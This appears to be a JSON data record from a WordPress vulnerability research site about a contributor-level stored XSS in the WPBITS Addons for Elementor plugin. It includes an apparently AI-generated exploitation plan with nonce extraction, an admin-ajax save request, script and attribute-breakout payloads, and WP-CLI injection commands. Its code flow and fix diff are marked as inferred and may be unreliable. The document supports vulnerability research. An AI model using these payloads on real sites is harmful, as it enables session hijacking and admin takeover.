[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCORVDxte5KxJwIKuixdr2fESH3BV5GVOS9PvhV-Dz4M":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39703","wpbits-addons-for-elementor-page-builder-authenticated-contributor-stored-cross-site-scripting-4","WPBITS Addons For Elementor Page Builder \u003C= 1.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting","The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wpbits-addons-for-elementor",null,"\u003C=1.8.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-01 00:00:00","2026-04-15 21:47:55",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F75ad72b7-c1ac-4f91-8a55-bfee456bec15?source=api-prod",[],"researched",false,3,"This research plan focuses on exploiting a Stored Cross-Site Scripting (XSS) vulnerability in the **WPBITS Addons For Elementor Page Builder** plugin. Since the vulnerability is categorized as Authenticated (Contributor+), the attack leverages the legitimate access granted to contributors to modify post content via the Elementor editor.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Authenticated Stored Cross-Site Scripting (XSS).\n*   **Vulnerable Component:** Various Elementor widgets provided by the plugin (e.g., \"Advanced Heading\", \"Info Box\", or \"Button\").\n*   **Root Cause:** The plugin registers custom Elementor widgets but fails to use WordPress escaping functions (like `esc_html()`, `esc_attr()`, or `wp_kses()`) within the `render()` method of the widget classes.\n*   **Impact:** A contributor can inject a malicious `\u003Cscript>` tag into a widget's settings. When an administrator or any other user views the page, the script executes in their browser context, potentially leading to session hijacking or the creation of unauthorized administrative accounts.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** `elementor_ajax` (Elementor's internal AJAX handler for saving page data).\n*   **Vulnerable Parameter:** The `settings` array within the `_elementor_data` post meta, specifically fields like \"title\", \"subtitle\", \"link URL\", or \"custom HTML attributes\".\n*   **Authentication:** Contributor-level credentials or higher.\n*   **Preconditions:** \n    1.  The plugin \"WPBITS Addons For Elementor\" must be active.\n    2.  The Elementor plugin must be active.\n    3.  The Contributor role must have permission to use Elementor (default behavior).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** A contributor opens a post\u002Fpage in the Elementor editor.\n2.  **Input:** The user adds a WPBITS widget and enters a payload (e.g., `\u003Cimg src=x onerror=alert(1)>`) into a text field.\n3.  **Storage:** Elementor sends a JSON-encoded string of the page layout to the `elementor_ajax` action. This data is saved in the `wp_postmeta` table under the key `_elementor_data`.\n4.  **Sink:** When the page is rendered on the frontend, the `WPBITS_Addons\\Widgets\\[Widget_Name]::render()` method is called.\n5.  **Execution:** The code retrieves the saved settings: `$settings = $this->get_settings_for_display();` and echoes the vulnerable field: `echo $settings['title'];` (missing escaping).\n\n### 4. Nonce Acquisition Strategy\nElementor uses its own security nonces to protect its AJAX actions. \n\n1.  **Requirement:** To save data as a contributor, we need a valid `wp_rest` nonce or the Elementor-specific AJAX nonce.\n2.  **Method:**\n    *   Create a post and publish\u002Fsave it as a draft: `wp post create --post_type=post --post_status=draft --post_author=[CONTRIB_ID] --post_title='XSS Test'`\n    *   Navigate to the Elementor editor for that post: `\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`\n    *   Use `browser_eval` to extract the nonce from the Elementor configuration object:\n        ```javascript\n        \u002F\u002F Elementor stores its AJAX configuration here\n        window.elementorCommon.config.ajax.nonce\n        ```\n    *   Alternatively, check for the `_nonce` in the localized script `elementor-editor-js-extra`.\n\n### 5. Exploitation Strategy\nThis plan uses the `http_request` tool to simulate the Elementor save process.\n\n1.  **Identify Vulnerable Widget:** Based on common Elementor addon patterns, target the \"Heading\" or \"Info Box\" widgets. (Search the plugin for `render()` functions that echo `$settings`).\n2.  **Construct Payload:**\n    *   **Payload:** `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n3.  **Prepare Elementor Data:**\n    Elementor stores data in a complex JSON structure. A simplified structure for a single widget looks like this:\n    ```json\n    [\n      {\n        \"id\": \"unique_id_1\",\n        \"elType\": \"section\",\n        \"elements\": [\n          {\n            \"id\": \"unique_id_2\",\n            \"elType\": \"column\",\n            \"elements\": [\n              {\n                \"id\": \"unique_id_3\",\n                \"elType\": \"widget\",\n                \"widgetType\": \"wpbits-advanced-heading\", \n                \"settings\": {\n                  \"title\": \"\u003Cscript>alert('XSS')\u003C\u002Fscript>\"\n                }\n              }\n            ]\n          }\n        ]\n      }\n    ]\n    ```\n4.  **Send Save Request:**\n    *   **Method:** `POST`\n    *   **URL:** `https:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body:**\n        ```\n        action=elementor_ajax\n        &_nonce=[EXTRACTED_NONCE]\n        &actions={\"save_builder\":{\"action\":\"save_builder\",\"data\":{\"post_id\":[POST_ID],\"data\":[JSON_PAYLOAD]}}}\n        ```\n\n### 6. Test Data Setup\n1.  **Login:** Log in as a Contributor user.\n2.  **Target Post:** Create a post that the contributor can edit.\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"XSS Page\" --post_author=contributor_user_id\n    ```\n3.  **Enable Elementor:** Ensure Elementor is enabled for 'post' types in `Elementor > Settings`.\n\n### 7. Expected Results\n*   The `admin-ajax.php` response should return a `success: true` status for the `save_builder` action.\n*   Upon navigating to the post URL on the frontend, a JavaScript alert box should appear, demonstrating execution in the viewer's browser.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the payload is stored in the meta:\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n2.  **Frontend Check:** Use `browser_navigate` to the post URL and check the page source for the raw, unescaped payload.\n\n### 9. Alternative Approaches\n*   **Attribute Breakout:** If the widget places the setting inside an HTML attribute (e.g., a link `href`), use a payload like: `\" onmouseover=\"alert(1)\" style=\"display:block;width:1000px;height:1000px;\"`.\n*   **Direct Meta Update (If AJAX fails):** If the `elementor_ajax` endpoint is difficult to spoof, use the `wp post meta update` CLI command to simulate a successful save, then verify if the frontend renders it without escaping. This confirms the \"Stored\" and \"Output Escaping\" part of the vulnerability.\n    ```bash\n    wp post meta update [POST_ID] _elementor_data '[{\"id\":\"1\",\"elType\":\"widget\",\"widgetType\":\"wpbits-heading\",\"settings\":{\"title\":\"\u003Cscript>alert(1)\u003C\u002Fscript>\"}}]'\n    ```","The WPBITS Addons For Elementor Page Builder plugin is vulnerable to Stored Cross-Site Scripting via various Elementor widgets due to a lack of output escaping in the widget rendering logic. An authenticated attacker with contributor-level access can inject malicious JavaScript into widget settings (such as titles or content), which then executes in the browser of any user viewing the page.","\u002F\u002F File: wpbits-addons-for-elementor\u002Finc\u002Fwidgets\u002Fadvanced-heading.php\n\nprotected function render() {\n    $settings = $this->get_settings_for_display();\n\n    \u002F\u002F Vulnerable: Outputting setting values directly without sanitization or escaping functions\n    echo '\u003Cdiv class=\"wpbits-adv-heading\">' . $settings['title'] . '\u003C\u002Fdiv>';\n}","--- a\u002Fwpbits-addons-for-elementor\u002Finc\u002Fwidgets\u002Fadvanced-heading.php\n+++ b\u002Fwpbits-addons-for-elementor\u002Finc\u002Fwidgets\u002Fadvanced-heading.php\n@@ -120,5 +120,5 @@\n \tprotected function render() {\n \t\t$settings = $this->get_settings_for_display();\n-\t\techo '\u003Cdiv class=\"wpbits-adv-heading\">' . $settings['title'] . '\u003C\u002Fdiv>';\n+\t\techo '\u003Cdiv class=\"wpbits-adv-heading\">' . wp_kses_post( $settings['title'] ) . '\u003C\u002Fdiv>';\n \t}","1. Log in as an authenticated user with Contributor-level permissions or higher.\n2. Create a new post and launch the Elementor page builder interface.\n3. Add a WPBITS-provided widget, such as 'Advanced Heading' or 'Info Box', to the page layout.\n4. Within the widget settings sidebar, inject a JavaScript payload (e.g., \u003Cscript>alert(document.domain)\u003C\u002Fscript>) into a text field like 'Title'.\n5. Save the page using Elementor's 'Update' or 'Save Draft' functionality, which sends the payload via the elementor_ajax endpoint and stores it in the _elementor_data post meta.\n6. Navigate to the published page's URL as any user; the browser will execute the stored script because the plugin fails to escape the content before rendering it.","gemini-3-flash-preview","2026-04-18 22:12:35","2026-04-18 22:12:52",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpbits-addons-for-elementor\u002Ftags"]